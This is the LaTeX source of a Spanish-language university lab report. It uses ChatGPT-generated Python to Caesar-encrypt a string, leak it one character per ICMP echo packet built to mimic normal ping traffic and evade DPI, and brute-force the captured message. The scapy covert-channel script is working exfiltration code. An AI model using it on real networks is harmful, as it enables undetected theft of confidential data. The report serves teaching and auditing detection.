\documentclass[letter,12pt]{article}
\usepackage[paperheight=27.94cm,paperwidth=21.59cm,bindingoffset=0in,left=3cm,right=2.0cm, top=3.5cm,bottom=2.5cm, headheight=200pt, headsep=1.0\baselineskip]{geometry}
\usepackage{graphicx,lastpage}
\usepackage{upgreek}
\usepackage{censor}
\usepackage[spanish,es-tabla]{babel}
\usepackage{pdfpages}
\usepackage{tabularx}
\usepackage{graphicx}
\usepackage{adjustbox}
\usepackage{xcolor}
\usepackage{colortbl}
\usepackage{rotating}
\usepackage{multirow}
\usepackage[utf8]{inputenc}
\usepackage{float}
\usepackage{listings}

\renewcommand{\tablename}{Tabla}
\renewcommand{\lstlistingname}{Código}
\usepackage{fancyhdr}
\pagestyle{fancy}

\lstset{language=Python, 
 basicstyle=\fontsize{9}{10}\selectfont\italics,
 keywordstyle=\color{blue},
 commentstyle=\color{green!50!gray},
 stringstyle=\color{red},
 showstringspaces=false,
 numberstyle=\tiny,
 breaklines=true,
 %frame=single,
 backgroundcolor=\color{gray!10}
}



%
\begin{document}
%
   \title{\Huge{Informe Laboratorio 1}}

   \author{\textbf{Sección 2} \\  \\Iván Andrés Cáceres Satorres \\ e-mail: ivan.caceres\_s@mail.udp.cl}
          
   \date{29 de agosto de 2023}

   \maketitle
   
   \tableofcontents
 
  \newpage
  

\section{Descripción}

\begin{enumerate}
    \item  Usted empieza a trabajar en una empresa tecnológica que se jacta de poseer sistemas que permiten identificar filtraciones de información a través de Deep Packet Inspection (DPI).
    A usted le han encomendado auditar si efectivamente estos sistemas son capaces de detectar las filtraciones a través de tráfico de red. Debido a que el programa ping es ampliamente utilizado desde dentro y hacia fuera de la empresa, su tarea será crear un software que permita replicar tráfico generado por el programa ping con su configuración por defecto, pero con fragmentos de información confidencial. Recuerde que al comparar tráfico real con el generado no debe gatillar alarmas.
    De todas formas, deberá hacer una prueba de concepto, en la cual se demuestre que al conocer el algoritmo, será fácil determinar el mensaje en claro.
    Para los pasos 1,2,3 indicar el texto entregado a ChatGPT y validar si el código resultante cumple con lo requerido.


\end{enumerate}
\section{Actividades}


\subsection{Algoritmo de cifrado}

\begin{enumerate}
\item Generar un programa, en python3 utilizando chatGPT, que permita cifrar texto utilizando el algoritmo Cesar. Como parámetros de su programa deberá ingresar el string a cifrar y luego el corrimiento.
\begin{figure}[H]
        \centering
        \includegraphics[width=15cm]{actividades/A1.png}
        \label{fig:a1}
\end{figure}


\end{enumerate}

\subsection{Modo stealth}

\begin{enumerate}
    \item Generar un programa, en python3 utilizando ChatGPT, que permita enviar los caracteres del string (el del paso 1) en varios paquetes ICMP request (un caracter por paquete en el campo data de ICMP) para de esta forma no gatillar sospechas sobre la filtración de datos.
Deberá mostrar los campos de un ping real previo y posterior al suyo y demostrar que su tráfico consideró todos los aspectos para pasar desapercibido.
    \begin{figure}[H]
        \centering
        \includegraphics[width=15cm]{actividades/A2.1.png}
        \label{fig:a2-1}
    \end{figure}
    El último carácter del mensaje se transmite como una b.
    \begin{figure}[H]
            \centering
            \includegraphics[width=15cm]{actividades/A2.2.png}
            \label{fig:a2-2}
        \end{figure}
\end{enumerate}

\subsection{MitM}
\begin{enumerate}
    \item Generar un programa, en python3 utilizando ChatGPT, que permita obtener el mensaje transmitido en el paso2. Como no se sabe cual es el corrimiento utilizado, genere todas las combinaciones posibles e imprímalas, indicando en verde la opción más probable de ser el mensaje en claro.
    \begin{figure}[H]
        \centering
        \includegraphics[width=12cm]{actividades/A3.png}
        \label{fig:a3}
    \end{figure}
    Finalmente, deberá indicar 4 issues que haya tenido al lidiar con ChatGPT, netamente para reflejar cuál fue su experiencia al trabajar con esta tecnología.

\end{enumerate}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

\section{Desarrollo de Actividades}

\subsection{Actividad 1}
Para comenzar, el 'prompt' introducido a ChatGPT es el siguiente:

\begin{figure}[H]
        \centering
        \includegraphics[width=16cm]{prompts/A1.png}
        \caption{Prompt para realizar la actividad 1.}
        \label{fig:a3}
\end{figure}

A continuación, se muestra el código proporcionado por ChatGPT:

\begin{lstlisting}[caption={Código python generado por ChatGPT para la actividad 1}]
    import sys

def cesar_cipher(text, shift):
    encrypted_text = ""

    for char in text:
        if char.isalpha():
            ascii_offset = ord('a') if char.islower() else ord('A')
            encrypted_char = chr((ord(char) - ascii_offset + shift) % 26 + ascii_offset)
            encrypted_text += encrypted_char
        else:
            encrypted_text += char

    return encrypted_text

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Uso: python3 cesar.py <texto> <corrimiento>")
        sys.exit(1)

    text_to_encrypt = sys.argv[1]
    shift = int(sys.argv[2])

    encrypted_text = cesar_cipher(text_to_encrypt, shift)
    print("Texto cifrado:", encrypted_text)

\end{lstlisting}

Para verificar el correcto funcionamiento del código, se introdujo el mismo texto que se proporciona en el ejemplo 'criptografía y seguridad en redes', utilizando un desplazamiento de 9. El resultado obtenido fue la misma salida 'larycxpajorj h bnpdarmjm nw anmnb', lo que demuestra con éxito que el código cumple con los requisitos establecidos."

\begin{figure}[H]
        \centering
        \includegraphics[width=15cm]{consola/A1.png}
        \caption{Generando la palabra cifrada en cifrado Cesar con un corrimiento de 9.}
        \label{fig:a3}
\end{figure}

\subsection{Actividad 2}

El prompt proporcionado a ChatGPT es el siguiente:

\begin{figure}[H]
        \centering
        \includegraphics[width=15cm]{prompts/A2.png}
        \caption{Prompt para realizar la actividad 2.}
        \label{fig:a3}
\end{figure}

A continuación, se muestra el código generado:

\begin{lstlisting}[caption={Código python generado por ChatGPT para la actividad 2}]
#!/usr/bin/env python3
import sys
import time
from scapy.all import IP, ICMP, send, Raw
from datetime import datetime

def send_icmp_packets(data):
    dest_ip = "8.8.8.8"  # IP de destino (puedes cambiarlo si es necesario)
    sequence_number = 1
    identifier = 0x001c  # Cambia esto si deseas un valor diferente

    additional_data_hex = "00040000000000101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637"
    additional_data = bytes.fromhex(additional_data_hex).decode("utf-8")

    for char in data:

        current_time = datetime.now()
        # Formatear la fecha y hora actual en el formato deseado
        formatted_time = current_time.strftime('%b %d, %Y %H:%M:%S')
        # Convertir la cadena de fecha a un objeto datetime
        date_obj = datetime.strptime(formatted_time, '%b %d, %Y %H:%M:%S')
        # Obtener el timestamp UNIX (segundos desde la época)
        timestamp = int(date_obj.timestamp())
        # Convertir el timestamp en una cadena hexadecimal
        hex_timestamp = format(timestamp, 'x').zfill(16)
        # Invertir la cadena hexadecimal para formato little-endian
        hex_timestamp_little_endian = ''.join(reversed([hex_timestamp[i:i+2] for i in range(0, len(hex_timestamp), 2)]))
        # Convertir la cadena hexadecimal en bytes
        timestamp_bytes = bytes.fromhex(hex_timestamp_little_endian)
        full_data = char + additional_data
        icmp_packet = IP(dst=dest_ip)/ICMP(id=identifier, seq=sequence_number)/ Raw(timestamp_bytes) /full_data
        send(icmp_packet)
        sequence_number += 1
        time.sleep(0.1)  # Pausa breve entre paquetes para evitar inundar la red

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Uso: {} <cadena>".format(sys.argv[0]))
        sys.exit(1)

    input_string = sys.argv[1]
    send_icmp_packets(input_string)




\end{lstlisting}
Se genera el tráfico ICMP con dirección IP 8.8.8.8 con la frase 'larycxpajorj h bnpdarmjm nw anmnb' la cual ya está cifrada con cesar y corrimiento 9.

\begin{figure}[H]
    \centering
    \includegraphics[width=12cm]{consola/A2.2.png}
    \caption{Enviando secuencia de 'pings' con frase cifrada.}
    \label{fig:a3}
\end{figure}


A continuación, se procede a verificar la funcionalidad de lo realizado mediante Wireshark, aplicando el filtro 'icmp'.
\begin{enumerate}
    
    \item Para empezar, se observan los campos de un ping previamente ejecutado utilizando el comando 'ping 8.8.8.8' en la terminal:

    \begin{figure}[H]
            \centering
            \includegraphics[width=12cm]{wireshark/real_ping.png}
            \caption{Wireshark: 'Ping' real previo a la serie de pings del programa.}
            \label{fig:a3}
    \end{figure}
    Se puede observar un paquete 'ping' común y corriente con los campos habituales: 
    \begin{itemize}
        \item type: 8 (Echo (ping) request)
        \item Code: 0
        \item Checksum: 0xb02e [correct]
        \item Identifier (BL): 34
        \item Identifier (LE): 8704
        \item Sequence Number (BE): 2
        \item Sequence Number (LE): 512
        \item Timestamp from icmp data: Aug 29, 2023 17:04:58.000000000 -04
        \item Data (48 bytes)
    \end{itemize}
    Se destaca la longitud de los datos, que consta de 48 bytes, donde los bytes 0x10 al 0x37 se repiten en todos los pings. Además, un aspecto de gran relevancia es el timestamp, el cual indica la fecha exacta en la que el paquete fue enviado.
    
    \item Los campos de los pings generados por el programa en Python son los siguientes:
    
    \begin{figure}[H]
            \centering
            \includegraphics[width=12cm]{wireshark/python_ping.png}
            \caption{Wireshark: Primer 'ping' enviado con el campo data modificado.}
            \label{fig:a3}
    \end{figure}
    Es evidente que la secuencia de paquetes 'ping' generada por el programa en Python resulta coherente, ya que todos los campos previamente mencionados se encuentran presentes. Esto implica mantener identificadores consistentes, asegurar números de secuencia progresivos en cada paquete de la serie, conservar el timestamp y mantener la coherencia del ID. Es relevante mencionar que el campo 'data' incluye en su primer byte el carácter correspondiente (en este caso, la letra 'l', dado que es el primer paquete de la secuencia) de la cadena transmitida, manteniendo los primeros 8 bytes de datos y rellenando hasta alcanzar 48 bytes con la información predeterminada incluida en el payload, que va desde 0x10 hasta 0x37. Esto asegura que el paquete tenga la misma longitud que un 'ping' convencional de 48 bytes.

    En la figura siguiente, se observa cómo los paquetes comparten la misma identificación (ID), dado que forman parte de una secuencia continua.
    \begin{figure}[H]
            \centering
            \includegraphics[width=2cm]{wireshark/id.png}
            \caption{Wireshark: Comprobación campo id coherente.}
            \label{fig:a3}
    \end{figure}
    
    A continuación, se verifica la coherencia del campo 'seq number'. El número aumenta en una unidad en cada solicitud ICMP, lo que explica por qué el mismo número aparece dos veces: primero en la solicitud ICMP y luego en la respuesta ICMP asociada a esa solicitud.
    \begin{figure}[H]
            \centering
            \includegraphics[width=2cm]{wireshark/seq.png}
            \caption{Wireshark: Comprobación campo seq number coherente.}
            \label{fig:a3}
    \end{figure}
    
\end{enumerate}

\subsection{Actividad 3}
Para llevar a cabo el ataque Man-in-the-Middle (MitM), se introdujo el siguiente prompt en ChatGPT:

\begin{figure}[H]
        \centering
        \includegraphics[width=12cm]{prompts/A3.png}
        \caption{Prompt para realizar la actividad 3.}
        \label{fig:a3}
\end{figure}

Esto resulta en la generación del siguiente código en Python:

\begin{lstlisting}[caption={Código python generado por ChatGPT para la actividad 3}]
import sys
import scapy.all as scapy
from colorama import init, Fore, Style
# Inicializar colorama
init(autoreset=True)
# Obtener la ruta del archivo .pcapng desde la línea de comandos
pcapng_file = sys.argv[1]
# Cargar el archivo .pcapng y filtrar los paquetes ICMP Request
packets = scapy.rdpcap(pcapng_file)
icmp_request_packets = [packet for packet in packets if packet.haslayer(scapy.ICMP) and packet[scapy.ICMP].type == 8]
# Obtener el primer caracter del campo 'data' de cada paquete ICMP Request
characters = [chr(packet[scapy.ICMP].load[0]) for packet in icmp_request_packets]
# Función para descifrar el mensaje con cifrado César
def decrypt_cesar(text, shift):
    decrypted_text = ""
    for char in text:
        if char.isalpha():
            shifted_index = (ord(char) - ord('a') - shift) % 26
            decrypted_char = chr(shifted_index + ord('a'))
            decrypted_text += decrypted_char
        else:
            decrypted_text += char
    return decrypted_text
# Diccionario para almacenar las opciones de descifrado y su frecuencia
decrypted_options = {}
# Probar todas las combinaciones posibles de cifrado César
for shift in range(26):
    decrypted_message = decrypt_cesar(characters, shift)
    
    # Almacenar la opción de descifrado en el diccionario
    decrypted_options[shift] = decrypted_message
# Encontrar la opción más probable (con mayor frecuencia de letras comunes)
most_probable_shift = max(decrypted_options, key=lambda k: sum(decrypted_options[k].count(letter) for letter in "aeiou"))
# Imprimir todas las opciones de descifrado con la opción más probable resaltada en verde
for shift, message in decrypted_options.items():
    if shift == most_probable_shift:
        print(f"Shift {shift:2d}: {Fore.GREEN}{message.upper()}{Style.RESET_ALL}")
    else:
        print(f"Shift {shift:2d}: {message}")

\end{lstlisting}

La captura realizada en la actividad 2 se utiliza como base para llevar a cabo esta actividad. Como resultado, se obtiene el siguiente resultado:

    \begin{figure}[H]
            \centering
            \includegraphics[width=12cm]{consola/A3.png}
            \caption{Resultado en consola del programa python para realizar el MitM}
            \label{fig:a3}
    \end{figure}

Se puede observar que el programa lee el tráfico almacenado en el archivo Lab1.pcapng y lo filtra utilizando el criterio 'icmp'. Luego, concatena el primer carácter de los datos de cada paquete ICMP y realiza pruebas con las 26 opciones posibles debido a las letras en el abecedario. Se puede apreciar que la opción correspondiente a un desplazamiento de 9 en el cifrado César se encuentra resaltada en verde, lo cual confirma la precisión del programa.

% Please add the following required packages to your document preamble:
%\begin{table}[htbp]

\section*{Conclusiones y Comentarios}

Durante la realización de este trabajo, enfrenté varias complicaciones al interactuar con ChatGPT. Algunos de los desafíos que enfrenté incluyeron:

\begin{enumerate}
    \item La complejidad de generar un prompt completo que abarcara todos los requisitos. Esto implicó encontrar la manera más efectiva de expresar las instrucciones y detalles para obtener resultados precisos.
    \item Realicé múltiples intentos para corregir y mejorar la estructura del código. Dar con el programa que lograra hacer lo que solicitaba fue un proceso iterativo.
    \item Dado que su conocimiento se limita hasta 2021, algunos códigos generados incluyen dependencias y módulos que ya no están en uso en la actualidad. Esto resultó en códigos que no funcionaban de inmediato. Fue necesario adaptar y actualizar las dependencias y bibliotecas a versiones más recientes para que los códigos fueran compatibles y ejecutables.
    \item Finalmente, lo que representó el mayor desafío fue comunicar a ChatGPT cómo debía configurarse el campo de timestamp. No fue suficiente explicarlo en términos generales; tuve que proporcionar instrucciones específicas sobre la cantidad de bytes y el formato necesario para el timestamp.
\end{enumerate}

A pesar de todas estas dificultades, ChatGPT es una herramienta sobresaliente y me resultó sumamente útil. No es necesario ser un experto en el tema para lograr lo que se propone. Es importante resaltar que, al acercarnos a temas de seguridad, ChatGPT muestra cierta reticencia cuando se le hacen preguntas muy específicas. Esto se debe a las cuestiones éticas relacionadas con la ilegalidad de ciertas acciones que podrían estar involucradas.

\end{document}
